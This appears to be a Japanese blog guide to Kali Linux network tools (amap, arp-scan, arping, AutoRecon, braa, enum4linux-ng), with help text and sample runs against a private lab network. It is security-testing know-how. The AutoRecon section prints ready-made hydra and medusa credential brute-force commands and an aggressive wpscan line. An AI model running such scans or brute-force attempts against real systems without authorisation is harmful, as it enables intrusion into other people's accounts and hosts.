Kali Tools に掲載されているツールの中から実際に動作確認したものを簡単にご紹介します。
※全ツールの5割程度のご紹介となります。紹介していないツールは検証環境が用意できなかったり、エラーで確認できない、使い方がよく分からないなどが主な理由ですが、数が多過ぎてブラウザが固まってしまうため一部割愛させて頂きました。ご容赦ください。
※ツールのカテゴリーは私が大雑把に付けただけなので適していないかもしれません(ツールの並び順はA~Zの順で試してまとめただけで特に意味はありません)。
Network Tools
Network Scanning
Amap
指定されたポートで稼働しているアプリケーションを推測します。
■ 使用方法
root@kali:~# amap --help
Syntax: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
Modes:
-A Map applications: send triggers and analyse responses (default)
-B Just grab banners, do not send triggers
-P No banner or application stuff - be a (full connect) port scanner
Options:
-1 Only send triggers to a port until 1st identification. Speeeeed!
-6 Use IPv6 instead of IPv4
-b Print ascii banner of responses
-i FILE Nmap machine readable outputfile to read ports from
-u Ports specified on commandline are UDP (default is TCP)
-R Do NOT identify RPC service
-H Do NOT send application triggers marked as potentially harmful
-U Do NOT dump unrecognised responses (better for scripting)
-d Dump all responses
-v Verbose mode, use twice (or more!) for debug (not recommended :-)
-q Do not report closed ports, and do not print them as unidentified
-o FILE [-m] Write output to file FILE, -m creates machine readable output
-c CONS Amount of parallel connections to make (default 32, max 256)
-C RETRIES Number of reconnects on connect timeouts (see -T) (default 3)
-T SEC Connect timeout on connection attempts in seconds (default 5)
-t SEC Response wait timeout in seconds (default 5)
-p PROTO Only send triggers for this protocol (e.g. ftp)
TARGET PORT The target address and port(s) to scan (additional to -i)
■ 使用例
root@kali:~# nmap 192.168.11.4 -oM scan.out
root@kali:~# amap -i scan.out
Protocol on 192.168.11.4:21/tcp matches ftp
Protocol on 192.168.11.4:3306/tcp matches mysql
Protocol on 192.168.11.4:6667/tcp matches ircd
Protocol on 192.168.11.4:5900/tcp matches vnc
Protocol on 192.168.11.4:23/tcp matches telnet
Protocol on 192.168.11.4:8180/tcp matches http
Protocol on 192.168.11.4:8180/tcp matches http-apache-2
Protocol on 192.168.11.4:22/tcp matches ssh
Protocol on 192.168.11.4:22/tcp matches ssh-openssh
Protocol on 192.168.11.4:80/tcp matches http
Protocol on 192.168.11.4:80/tcp matches http-apache-2
Protocol on 192.168.11.4:2121/tcp matches ftp
Protocol on 192.168.11.4:25/tcp matches smtp
Protocol on 192.168.11.4:445/tcp matches mysql
Protocol on 192.168.11.4:445/tcp matches netbios-session
Protocol on 192.168.11.4:139/tcp matches ms-ds
Protocol on 192.168.11.4:445/tcp matches ms-ds
Protocol on 192.168.11.4:513/tcp matches (response_of_many_applications)
Protocol on 192.168.11.4:139/tcp matches mysql
Protocol on 192.168.11.4:139/tcp matches netbios-session
Protocol on 192.168.11.4:5432/tcp matches mysql
Protocol on 192.168.11.4:513/tcp matches rlogin
Protocol on 192.168.11.4:6000/tcp matches x-windows
arp-scan
ARPプロトコルを使ってローカルネットワーク上のIPv4ホストを検出します。
■ 使用方法
root@kali:~# arp-scan --help
Usage: arp-scan [options] [hosts...]
[...]
Options:
The data type for option arguments is shown by a letter in angle brackets:
<s> Character string.
<i> Decimal integer, or hex if preceeded by 0x e.g. 2048 or 0x800.
<f> Floating point decimal number.
<m> MAC address, e.g. 01:23:45:67:89:ab or 01-23-45-67-89-ab (case insensitive)
<a> IPv4 address e.g. 10.0.0.1
<h> Hex encoded binary data. No leading 0x. (case insensitive).
<x> Something else - see option description.
General Options:
--help or -h Display this usage message and exit.
--verbose or -v Display verbose progress messages.
Can be used than once to increase verbosity. Max=3.
--version or -V Display program version details and exit.
Shows the version, license details, libpcap version,
and whether POSIX.1e capability support is included.
--interface=<s> or -I <s> Use network interface <s>.
If this option is not specified, arp-scan will search
the system interface list for the lowest numbered,
configured up interface (excluding loopback).
Host Selection:
--file=<s> or -f <s> Read hostnames or addresses from the specified file
One name or address pattern per line. Use "-" for stdin.
--localnet or -l Generate addresses from interface configuration.
Generates list from interface address and netmask
(network and broadcast included). You cannot use the
--file option or give targets on the command line.
Use --interface to specify the interface.
MAC/Vendor Mapping Files:
--ouifile=<s> or -O <s> Use IEEE registry vendor mapping file <s>.
Default is ieee-oui.txt in the current directory. If
that is not found /usr/share/arp-scan/ieee-oui.txt
is used.
--macfile=<s> or -m <s> Use custom vendor mapping file <s>.
Default is mac-vendor.txt in the current directory.
If that is not found
/etc/arp-scan/mac-vendor.txt is used.
Output Format Control:
--quiet or -q Display minimal output for each responding host.
Only the IP address and MAC address are displayed.
Reduces memory usage by about 5MB because the
vendor mapping files are not used. Only the ${ip}
and ${mac} fields are available for the --format
option if --quiet is specified.
--plain or -x Supress header and footer text.
Only display the responding host details. Useful if
the output will be parsed by a script.
--ignoredups or -g Don\'t display duplicate packets.
By default duplicate packets are flagged with
"(DUP: n)" where n is the number of times this
host has responded.
--rtt or -D Calculate and display the packet round-trip time.
The time is displayed in milliseconds and fractional
microseconds. Makes the ${rtt} field available for
--format.
--format=<s> or -F <s> Specify the output format string.
The format is a string that will be output for each
responding host. Host details can be included by
inserting references to fields using the syntax
"${field[;width]}". Fields are displayed right-
aligned unless the width is negative in which case
left alignment will be used. The following case-
insensitive field names are recognised:
IP Host IPv4 address in dotted quad format
Name Host name if --resolve option given
MAC Host MAC address xx:xx:xx:xx:xx:xx
HdrMAC Ethernet source addr if different
Vendor Vendor details string
Padding Padding after ARP packet in hex if nonzero
Framing Framing type if not Ethernet_II
VLAN 802.1Q VLAD ID if present
Proto ARP protocol if not 0x0800
DUP Packet number for duplicate packets (>1)
RTT Round trip time if --rtt option given
Only the "ip" and "mac" fields are available if the
--quiet option is specified.
Any characters that are not fields are output
verbatim. \"\" introduces escapes:
\n newline
\r carriage return
\t tab
\ suppress special meaning for following character
You should enclose the --format argument in 'single
quotes' to protect special characters from the shell.
Example: --format='${ip}\t${mac}\t${vendor}'
Host List Randomisation:
--random or -R Randomise the target host list.
--randomseed=<i> Seed the pseudo random number generator.
Useful if you want a reproducible --random order.
Output Timing and Retry:
--retry=<i> or -r <i> Set total number of attempts per host to <i>,
default=2.
--backoff=<f> or -b <f> Set backoff factor to <f>, default=1.50.
Multiplies timeout by <f> for each pass.
--timeout=<i> or -t <i> Set initial per host timeout to <i> ms, default=500.
This timeout is for the first packet sent to each host.
subsequent timeouts are multiplied by the backoff
factor which is set with --backoff.
--interval=<x> or -i <x> Set minimum packet interval to <x>.
This controls the outgoing bandwidth usage by limiting
the packet rate. If you want to use up to a given
bandwidth it is easier to use the --bandwidth option
instead. The interval is in milliseconds, or
microseconds if "u" is appended.
--bandwidth=<x> or -B <x> Set outbound bandwidth to <x>, default=256000.
The value is in bits per second. Append K for
kilobits or M for megabits (decimal multiples). You
cannot specify both --interval and --bandwidth.
DNS Resolution:
--numeric or -N Targets must be IP addresses, not hostnames.
Can reduce startup time for large target lists.
--resolve or -d Resolve responding addresses to hostnames.
The default output format will display the hostname
instead of the IPv4 address. This option makes the
${name} field available for the --format option.
Output ARP Packet:
--arpsha=<m> or -u <m> Set the ARP source Ethernet address.
Sets the 48-bit ar$sha field but does not change the
hardware address in the frame header, see --srcaddr
for how to change that address. Default is the
Ethernet address of the outgoing interface.
--arptha=<m> or -w <m> Set the ARP target Ethernet address.
Sets the 48-bit ar$tha field. The default is zero
because this field is not used for ARP request packets.
--arphrd=<i> or -H <i> Set the ARP hardware type, default=1.
Sets the 16-bit ar$hrd field. The default is 1
(ARPHRD_ETHER). Many operating systems also respond to
6 (ARPHRD_IEEE802)
--arppro=<i> or -p <i> Set the ARP protocol type, default=0x0800.
Sets the 16-bit ar$pro field. Most operating systems
only respond to 0x0800 (IPv4).
--arphln=<i> or -a <i> Set the hardware address length, default=6.
Sets the 8-bit ar$hln field. The lengths of the
ar$sha and ar$tha fields are not changed by this
option; it only changes the ar$hln field.
--arppln=<i> or -P <i> Set the protocol address length, default=4.
Sets the 8-bit ar$pln field. The lengths of the ar$spa
and ar$tpa fields are not changed by this option;
it only changes the ar$pln field.
--arpop=<i> or -o <i> Specify the ARP operation, default=1.
Sets the 16-bit ar$op field. Most operating systems
only respond to the value 1 (ARPOP_REQUEST).
--arpspa=<a> or -s <a> Set the source IPv4 address.
The address should be in dotted quad format, or the
string "dest", which sets the source address to
the target host address. The default is the outgoing
interface address. Sets the 32-bit ar$spa field. Some
operating systems only respond if the source address
is within the network of the receiving interface.
Setting ar$spa to the destination IP address can cause
some operating systems to report an address clash.
Output Ethernet Header:
--srcaddr=<m> or -S <m> Set the source Ethernet MAC address.
Default is the interface MAC address. This sets the
address in the Ethernet header. It does not change the
address in the ARP packet: use --arpsha to change
that address.
--destaddr=<m> or -T <m> Set the destination MAC address.
Sets the destination address in the Ethernet
header. Default is ff:ff:ff:ff:ff:ff (broadcast)
Hosts also respond if the request is sent to their
unicast address, or to a multicast address they
are listening on.
--prototype=<i> or -y <i> Sets the Ethernet protocol type, default=0x0806.
This sets the protocol type field in the Ethernet
header.
--llc or -L Use RFC 1042 LLC/SNAP encapsulation for 802.2 networks.
arp-scan will decode and display ARP responses in both
Ethernet-II and IEEE 802.2 formats irrespective of
this option.
--vlan=<i> or -Q <i> Use 802.1Q tagging with VLAN id <i>.
The id should be in the range 0 to 4095. arp-scan will
decode and display ARP responses in 802.1Q format
irrespective of this option.
Misc Options:
--limit=<i> or -M <i> Exit after the specified number of hosts have responded.
arp-scan will exit with status 1 if the number of
responding hosts is less than the limit. Can be used
in scripts to check if fewer hosts respond without
having to parse the output.
--pcapsavefile=<s> or -W <s> Write received packets to pcap savefile <s>.
ARP responses will be written to the specified file
as well as being decoded and displayed.
--snap=<i> or -n <i> Set the pcap snap length to <i>. Default=64.
Specifies the frame capture length, including the
Ethernet header. The default is normally sufficient.
--retry-send=<i> or -Y <i> Set number of send attempts, default=20.
--retry-send-interval=<i> or -E <i> Set interval between send attempts.
Interval is in milliseconds or microseconds if "u"
is appended. default=5.
--padding=<h> or -A <h> Specify padding after packet data.
Set padding after the ARP request to hex value <h>.
■ 使用例
root@kali:~# arp-scan --localnet
Interface: eth0, type: EN10MB, MAC: 00:15:5d:ec:c6:aa, IPv4: 192.168.11.2
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 d4:2c:46:be:0f:60 BUFFALO.INC
192.168.11.3 dc:fb:48:75:75:0b Intel Corporate
192.168.11.4 dc:a2:66:20:35:65 Hon Hai Precision Ind. Co.,Ltd.
ARPing
ローカルネットワーク上の指定されたIPアドレスに対してARPパケットをブロードキャストしてその応答結果を表示します。
■ 使用方法
root@kali:~# arping --help
usage: arping [ -0aAbdDeFpPqrRuUvzZ ] [ -w <sec> ] [ -W <sec> ] [ -S <host/ip> ]
[ -T <host/ip ] [ -s <MAC> ] [ -t <MAC> ] [ -c <count> ]
[ -C <count> ] [ -i <interface> ] [ -m <type> ] [ -g <group> ]
[ -V <vlan> ] [ -Q <priority> ] <host/ip/MAC | -B>
Options:
-0 Use this option to ping with source IP address 0.0.0.0. Use this
when you haven\'t configured your interface yet. Note that this
may get the MAC-ping unanswered. This is an alias for -S
0.0.0.0.
-a Audiable ping.
-A Only count addresses matching requested address (This *WILL*
break most things you do. Only useful if you are arpinging many
hosts at once. See arping-scan-net.sh for an example).
-b Like -0 but source broadcast source address (255.255.255.255).
Note that this may get the arping unanswered since it\'s not nor-
mal behavior for a host.
-B Use instead of host if you want to address 255.255.255.255.
-c count
Only send count requests.
-C count
Only wait for this many replies, regardless of -c and -w.
-d Find duplicate replies. Exit with 1 if there are answers from
two different MAC addresses.
-D Display answers as exclamation points and missing packets as dots.
-e Like -a but beep when there is no reply.
-F Don\'t try to be smart about the interface name. (even if this
switch is not given, -i overrides smartness)
-g group
setgid() to this group instead of the nobody group.
-h Displays a help message and exits.
-i interface
Use the specified interface.
-m type
Type of timestamp to use for incoming packets. Use -vv when
pinging to list available ones.
-q Does not display messages, except error messages.
-Q pri 802.1p priority to set. Should be used with 802.1Q (-V).
Defaults to 0.
-r Raw output: only the MAC/IP address is displayed for each reply.
-R Raw output: Like -r but shows "the other one", can be combined
with -r.
-s MAC Set source MAC address. You may need to use -p with this.
-S IP Like -b and -0 but with set source address. Note that this may
get the arping unanswered if the target does not have routing to
the IP. If you don\'t own the IP you are using, you may need to
turn on promiscious mode on the interface (with -p). With this
switch you can find out what IP-address a host has without tak-
ing an IP-address yourself.
-t MAC Set target MAC address to use when pinging IP address.
-T IP Use -T as target address when pinging MACs that won\'t respond to
a broadcast ping but perhaps to a directed broadcast.
Example:
To check the address of MAC-A, use knowledge of MAC-B and IP-B.
$ arping -S <IP-B> -s <MAC-B> -p <MAC-A>
-p Turn on promiscious mode on interface, use this if you don\'t
"own" the MAC address you are using.
-P Send ARP replies instead of requests. Useful with -U.
-u Show index=received/sent instead of just index=received when
pinging MACs.
-U Send unsolicited ARP.
-v Verbose output. Use twice for more messages.
-V num 802.1Q tag to add. Defaults to no VLAN tag.
-w sec Specify a timeout before ping exits regardless of how many
packets have been sent or received.
-W sec Time to wait between pings.
-z Enable seccomp
-Z Disable seccomp (default)
■ 使用例
root@kali:~# arping -c 3 -i eth0 192.169.11.4
ARPING 192.169.11.3
42 bytes from 02:42:ac:12:00:03 (192.169.11.4): index=0 time=9.301 usec
42 bytes from 02:42:ac:12:00:03 (192.169.11.4): index=1 time=4.900 usec
42 bytes from 02:42:ac:12:00:03 (192.169.11.4): index=2 time=13.101 usec
--- 192.169.11.3 statistics ---
3 packets transmitted, 3 packets received, 0% unanswered (0 extra)
rtt min/avg/max/std-dev = 0.005/0.009/0.013/0.003 ms
# arping実行中のパケットをキャプチャ
root@kali:~# tcpdump -n -i eth0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
11:59:12.063192 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:12.063247 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:12.063255 ARP, Reply 192.168.11.4 is-at 02:42:ac:12:00:03, length 28
11:59:13.064481 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:13.064511 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:13.064514 ARP, Reply 192.168.11.4 is-at 02:42:ac:12:00:03, length 28
11:59:14.065806 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:14.065878 ARP, Request who-has 192.168.11.4 tell 192.168.11.3, length 44
11:59:14.065888 ARP, Reply 192.168.11.4 is-at 02:42:ac:12:00:03, length 28
AutoRecon
ポートスキャン/サービス検出スキャンを実行し、検出結果に応じて適切なツールで追加のスキャンを行い、結果をレポート出力します。
■ 使用方法
root@kali:~# autorecon --help
usage: autorecon [-t TARGET_FILE] [-p PORTS] [-m MAX_SCANS] [-mp MAX_PORT_SCANS] [-c CONFIG_FILE] [-g GLOBAL_FILE] [--tags TAGS]
[--exclude-tags TAGS] [--port-scans PLUGINS] [--service-scans PLUGINS] [--reports PLUGINS]
[--plugins-dir PLUGINS_DIR] [--add-plugins-dir PLUGINS_DIR] [-l [TYPE]] [-o OUTPUT] [--single-target]
[--only-scans-dir] [--no-port-dirs] [--heartbeat HEARTBEAT] [--timeout TIMEOUT]
[--target-timeout TARGET_TIMEOUT] [--nmap NMAP | --nmap-append NMAP_APPEND] [--proxychains]
[--disable-sanity-checks] [--disable-keyboard-control] [--force-services SERVICE [SERVICE ...]]
[-mpti PLUGIN:NUMBER [PLUGIN:NUMBER ...]] [-mpgi PLUGIN:NUMBER [PLUGIN:NUMBER ...]] [--accessible] [-v]
[--version] [--curl.path VALUE] [--dirbuster.tool {feroxbuster,gobuster,dirsearch,ffuf,dirb}]
[--dirbuster.wordlist VALUE [VALUE ...]] [--dirbuster.threads VALUE] [--dirbuster.ext VALUE]
[--dirbuster.recursive] [--dirbuster.extras VALUE] [--enum4linux.tool {enum4linux-ng,enum4linux}]
[--onesixtyone.community-strings VALUE] [--subdomain-enum.domain VALUE]
[--subdomain-enum.wordlist VALUE [VALUE ...]] [--subdomain-enum.threads VALUE] [--vhost-enum.hostname VALUE]
[--vhost-enum.wordlist VALUE [VALUE ...]] [--vhost-enum.threads VALUE] [--wpscan.api-token VALUE]
[--global.username-wordlist VALUE] [--global.password-wordlist VALUE] [--global.domain VALUE] [-h]
[targets ...]
Network reconnaissance tool to port scan and automatically enumerate services found on multiple targets.
positional arguments:
targets IP addresses (e.g. 10.0.0.1), CIDR notation (e.g. 10.0.0.1/24), or resolvable hostnames (e.g. foo.bar)
to scan.
options:
-t TARGET_FILE, --target-file TARGET_FILE
Read targets from file.
-p PORTS, --ports PORTS
Comma separated list of ports / port ranges to scan. Specify TCP/UDP ports by prepending list with T:/U:
To scan both TCP/UDP, put port(s) at start or specify B: e.g. 53,T:21-25,80,U:123,B:123. Default: None
-m MAX_SCANS, --max-scans MAX_SCANS
The maximum number of concurrent scans to run. Default: 50
-mp MAX_PORT_SCANS, --max-port-scans MAX_PORT_SCANS
The maximum number of concurrent port scans to run. Default: 10 (approx 20% of max-scans unless
specified)
-c CONFIG_FILE, --config CONFIG_FILE
Location of AutoRecon\'s config file. Default: /root/.config/AutoRecon/config.toml
-g GLOBAL_FILE, --global-file GLOBAL_FILE
Location of AutoRecon\'s global file. Default: /root/.config/AutoRecon/global.toml
--tags TAGS Tags to determine which plugins should be included. Separate tags by a plus symbol (+) to group tags
together. Separate groups with a comma (,) to create multiple groups. For a plugin to be included, it
must have all the tags specified in at least one group. Default: default
--exclude-tags TAGS Tags to determine which plugins should be excluded. Separate tags by a plus symbol (+) to group tags
together. Separate groups with a comma (,) to create multiple groups. For a plugin to be excluded, it
must have all the tags specified in at least one group. Default: None
--port-scans PLUGINS Override --tags / --exclude-tags for the listed PortScan plugins (comma separated). Default: None
--service-scans PLUGINS
Override --tags / --exclude-tags for the listed ServiceScan plugins (comma separated). Default: None
--reports PLUGINS Override --tags / --exclude-tags for the listed Report plugins (comma separated). Default: None
--plugins-dir PLUGINS_DIR
The location of the plugins directory. Default: /root/.local/share/AutoRecon/plugins
--add-plugins-dir PLUGINS_DIR
The location of an additional plugins directory to add to the main one. Default: None
-l [TYPE], --list [TYPE]
List all plugins or plugins of a specific type. e.g. --list, --list port, --list service
-o OUTPUT, --output OUTPUT
The output directory for results. Default: results
--single-target Only scan a single target. A directory named after the target will not be created. Instead, the
directory structure will be created within the output directory. Default: False
--only-scans-dir Only create the "scans" directory for results. Other directories (e.g. exploit, loot, report) will not
be created. Default: False
--no-port-dirs Don\'t create directories for ports (e.g. scans/tcp80, scans/udp53). Instead store all results in the
"scans" directory itself. Default: False
--heartbeat HEARTBEAT
Specifies the heartbeat interval (in seconds) for scan status messages. Default: 60
--timeout TIMEOUT Specifies the maximum amount of time in minutes that AutoRecon should run for. Default: None
--target-timeout TARGET_TIMEOUT
Specifies the maximum amount of time in minutes that a target should be scanned for before abandoning it
and moving on. Default: None
--nmap NMAP Override the {nmap_extra} variable in scans. Default: -vv --reason -Pn -T4
--nmap-append NMAP_APPEND
Append to the default {nmap_extra} variable in scans. Default:
--proxychains Use if you are running AutoRecon via proxychains. Default: False
--disable-sanity-checks
Disable sanity checks that would otherwise prevent the scans from running. Default: False
--disable-keyboard-control
Disables keyboard control ([s]tatus, Up, Down) if you are in SSH or Docker.
--force-services SERVICE [SERVICE ...]
A space separated list of services in the following style: tcp/80/http tcp/443/https/secure
-mpti PLUGIN:NUMBER [PLUGIN:NUMBER ...], --max-plugin-target-instances PLUGIN:NUMBER [PLUGIN:NUMBER ...]
A space separated list of plugin slugs with the max number of instances (per target) in the following
style: nmap-http:2 dirbuster:1. Default: None
-mpgi PLUGIN:NUMBER [PLUGIN:NUMBER ...], --max-plugin-global-instances PLUGIN:NUMBER [PLUGIN:NUMBER ...]
A space separated list of plugin slugs with the max number of global instances in the following style:
nmap-http:2 dirbuster:1. Default: None
--accessible Attempts to make AutoRecon output more accessible to screenreaders. Default: False
-v, --verbose Enable verbose output. Repeat for more verbosity.
--version Prints the AutoRecon version and exits.
-h, --help Show this help message and exit.
plugin arguments:
These are optional arguments for certain plugins.
--curl.path VALUE The path on the web server to curl. Default: /
--dirbuster.tool {feroxbuster,gobuster,dirsearch,ffuf,dirb}
The tool to use for directory busting. Default: feroxbuster
--dirbuster.wordlist VALUE [VALUE ...]
The wordlist(s) to use when directory busting. Separate multiple wordlists with spaces. Default:
['/root/.local/share/AutoRecon/wordlists/dirbuster.txt']
--dirbuster.threads VALUE
The number of threads to use when directory busting. Default: 10
--dirbuster.ext VALUE
The extensions you wish to fuzz (no dot, comma separated). Default: txt,html,php,asp,aspx,jsp
--dirbuster.recursive
Enables recursive searching (where available). Warning: This may cause significant increases to scan
times. Default: False
--dirbuster.extras VALUE
Any extra options you wish to pass to the tool when it runs. e.g. --dirbuster.extras='-s 200,301
--discover-backup'
--enum4linux.tool {enum4linux-ng,enum4linux}
The tool to use for doing Windows and Samba enumeration. Default: enum4linux-ng
--onesixtyone.community-strings VALUE
The file containing a list of community strings to try. Default:
/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt
--subdomain-enum.domain VALUE
The domain to use as the base domain (e.g. example.com) for subdomain enumeration. Default: None
--subdomain-enum.wordlist VALUE [VALUE ...]
The wordlist(s) to use when enumerating subdomains. Separate multiple wordlists with spaces. Default:
['/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt']
--subdomain-enum.threads VALUE
The number of threads to use when enumerating subdomains. Default: 10
--vhost-enum.hostname VALUE
The hostname to use as the base host (e.g. example.com) for virtual host enumeration. Default: None
--vhost-enum.wordlist VALUE [VALUE ...]
The wordlist(s) to use when enumerating virtual hosts. Separate multiple wordlists with spaces. Default:
['/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt']
--vhost-enum.threads VALUE
The number of threads to use when enumerating virtual hosts. Default: 10
--wpscan.api-token VALUE
An API Token from wpvulndb.com to help search for more vulnerabilities.
global plugin arguments:
These are optional arguments that can be used by all plugins.
--global.username-wordlist VALUE
A wordlist of usernames, useful for bruteforcing. Default: /usr/share/seclists/Usernames/top-usernames-
shortlist.txt
--global.password-wordlist VALUE
A wordlist of passwords, useful for bruteforcing. Default:
/usr/share/seclists/Passwords/darkweb2017-top100.txt
--global.domain VALUE
The domain to use (if known). Used for DNS and/or Active Directory. Default: None
■ 使用例
root@kali:~# autorecon 192.168.11.4 \
--dirbuster.threads 40 \
--dirbuster.wordlist raft-large-directories.txt raft-large-files.txt \
--nmap-append="--script-timeout=30s" --no-port-dirs \
--reports markdown -o /root -v
[*] Scanning target 192.168.11.4
[*] Port scan Top TCP Ports (top-tcp-ports) running against 192.168.11.4
[*] Port scan Top TCP Ports (top-tcp-ports) is running the following command against 192.168.11.4: nmap -vv --reason -Pn -T4 --script-timeout=30s -sV -sC --version-all -A --osscan-guess -oN "/root/192.168.11.4/scans/_quick_tcp_nmap.txt" -oX "/root/192.168.11.4/scans/xml/_quick_tcp_nmap.xml" 192.168.11.4
[*] Port scan All TCP Ports (all-tcp-ports) running against 192.168.11.4
[...]
[*] Port scan Top 100 UDP Ports (top-100-udp-ports) against 192.168.11.4 finished in 3 minutes, 50 seconds
[*] Finished scanning target 192.168.11.4 in 3 minutes, 51 seconds
[*] Finished scanning all targets in 3 minutes, 52 seconds!
[*] Don\'t forget to check out more commands to run manually in the _manual_commands.txt file in each target\'s scans directory!
出力されるレポートの一例
Webサービスが検出されたため自動でNiktoが実行される。
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.11.4
+ Target Hostname: 192.168.11.4
+ Target Port: 80
+ Start Time: 2024-09-16 04:06:27 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.53 (Debian)
+ /: Retrieved x-powered-by header: PHP/7.4.28.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: <http://192.168.11.4/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index.php?: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.53 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login.php: Wordpress login found.
+ 7729 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2024-09-16 04:06:50 (GMT0) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
検出されたサービスに合わせて推奨スキャンが提示される(ユーザーによる手動実行)。
[*] http on tcp/80
[-] (ffuf) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
ffuf -u http://192.168.11.4:80/FUZZ -t 40 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v -r -noninteractive | tee /root/192.168.11.4/scans/tcp_80_http_ffuf_dirbuster.txt
[-] Credential bruteforcing commands (don\'t run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/root/192.168.11.4/scans/tcp_80_http_auth_hydra.txt" http-get://192.168.11.4/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/root/192.168.11.4/scans/tcp_80_http_auth_medusa.txt" -M http -h 192.168.11.4 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/root/192.168.11.4/scans/tcp_80_http_form_hydra.txt" http-post-form://192.168.11.4/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/root/192.168.11.4/scans/tcp_80_http_form_medusa.txt" -M web-form -h 192.168.11.4 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://192.168.11.4:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/root/192.168.11.4/scans/tcp_80_http_wpscan.txt"
Braa
SNMPスキャナーです。大量のホストに対して高速でスキャンを行うことができます。
■ 使用方法
root@kali:~# braa --help
usage: braa [options] [query1] [query2] ...
-h Show this help.
-2 Claim to be a SNMP2C agent.
-v Show short summary after doing all queries.
-x Hexdump octet-strings
-t <s> Wait <s> seconds for responses.
-d <s> Wait <s> microseconds after sending each packet.
-p <s> Wait <s> milliseconds between subsequent passes.
-f <file> Load queries from file <file> (one by line).
-a <time> Quit after <time> seconds, independent on what happens.
-r <rc> Retry count (default: 3).
Query format:
GET: [community@]iprange[:port]:oid[/id]
WALK: [community@]iprange[:port]:oid.*[/id]
SET: [community@]iprange[:port]:oid=value[/id]
Examples:
public@10.253.101.1:161:.1.3.6.*
10.253.101.1-10.253.101.255:.1.3.6.1.2.1.1.4.0=sme
10.253.101.1:.1.3.6.1.2.1.1.1.0/description
It is also possible to specify multiple queries at once:
10.253.101.1-10.253.101.255:.1.3.6.1.2.1.1.4.0=sme,.1.3.6.*
(Will set .1.3.6.1.2.1.1.4.0 to 'me' and do a walk starting from .1.3.6)
Values for SET queries have to be prepended with a character specifying the value type:
i is INTEGER
a is IPADDRESS
s is OCTET STRING
o is OBJECT IDENTIFIER
If the type specifier is missing, the value type is auto-detected
■ 使用例
# 2台のホストからsysDescr、hrStorageAllocationUnits 、hrStorageSizeを取得する
root@kali:~# braa \
public@192.168.11.3-192.168.11.4:.1.3.6.1.2.1.1.1.0/sysDescr \
public@192.168.11.3-192.168.11.4:.1.3.6.1.2.1.25.2.3.1.4.1/hrStorageAllocationUnits \
public@192.168.11.3-192.168.11.4:.1.3.6.1.2.1.25.2.3.1.5.1/hrStorageSize
sysDescr:192.168.11.3:21ms:.0:Hardware: Intel64 Family 6 Model 142 Stepping 11 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 22635 Multiprocessor Free)
hrStorageAllocationUnits:192.168.11.3:21ms:.1:4096
hrStorageSize:192.168.11.3:21ms:.1:62190335
sysDescr:192.168.11.4:21ms:.0:Hardware: AMD64 Family 23 Model 17 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 19045 Multiprocessor Free)
hrStorageAllocationUnits:192.168.11.4:21ms:.1:4096
hrStorageSize:192.168.11.4:21ms:.1:121528319
enum4linux-ng
ファイル共有プロトコル(主にSMB)を利用してマシンの情報を収集します。
■ 使用方法
root@kali:~# enum4linux-ng --help
usage: enum4linux-ng [-h] [-A] [-As] [-U] [-G] [-Gm] [-S] [-C] [-P] [-O] [-L] [-I] [-R [BULK_SIZE]] [-N] [-w DOMAIN] [-u USER]
